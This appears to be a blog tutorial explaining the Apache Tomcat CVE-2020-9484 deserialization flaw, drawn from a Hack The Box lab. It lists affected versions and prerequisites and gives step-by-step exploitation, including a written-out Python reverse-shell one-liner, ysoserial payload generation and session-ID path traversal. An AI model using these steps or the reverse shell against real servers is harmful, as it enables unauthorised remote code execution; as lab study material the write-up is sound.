Apache Tomcat RCE Deserialization (CVE-2020-9484)

Hi Guys,

I want to share a tutorial on the Apache Tomcat vulnerability CVE-2020-9484; I would like to share based on the experience gathered from hack the box machine Feline.

This vulnerability impacted the Tomcat version below; all version before April 2020 are impacted

1. Apache Tomcat 10.x < 10.0.0-M5
2. Apache Tomcat 9.x < 9.0.35
3. Apache Tomcat 8.x < 8.5.55
4. Apache Tomcat 7.x < 7.0.104

In order to exploit this vulnerability there are some pre-requisites as below

1. The PersistentManager is enabled, and it’s using a FileStore
2. The attacker can upload a file with arbitrary content, has to control over the filename, and knows the location where it is uploaded
3. There are gadgets in the classpath that can be used for a Java deserialization attack

The vulnerability

1. Tomcat requests the Manager to check if a session with session ID “../../../../../../tmp/12345” exists
2. It will first check if it has that session in memory.
3. It does not. But the currently running Manager is a PersistentManager, so it will also check if it has the session on disk.
4. It will check at location directory + sessionid + ".session", which evaluates to “./session/../../../../../../tmp/12345.session“
5. If the file exists, it will deserialize it and parse the session information from it

below is the enumeration result from the server error message that the server using apache common file upload

Let’s analyze the error that leaked when we uploaded the file to the server using the application about the file path

To exploit the vulnerability, we need to do the below action. Here we are trying to create a reverse shell

We need to create shell.sh file to be uploaded to the server

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fi>

  1. Generate the serialized object file using ysoserial. With the command bleow we are transfering file from the attacker and copied to /dev/shm/

2. The next step is to upload the file to the server. We can use the functionality from the application

3. The last step is to run the uploaded file using the JSESSIONID. You need to set the path of the file location to the JSESSIONID without the .session

4. Now the shell.sh has been uploaded to the server

5. Now we need to create a serialization where to execute the shell.sh that has been uploaded to /dev/shm

6. We need to upload the session file to the server in order to be loaded to the java

6. We execute it again with the same mechanism above like point no 3

Don’t forget before you execute point no. 6, You need to start your netcat server to catch the reverse connection from the victim

resource https://www.redtimmy.com/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s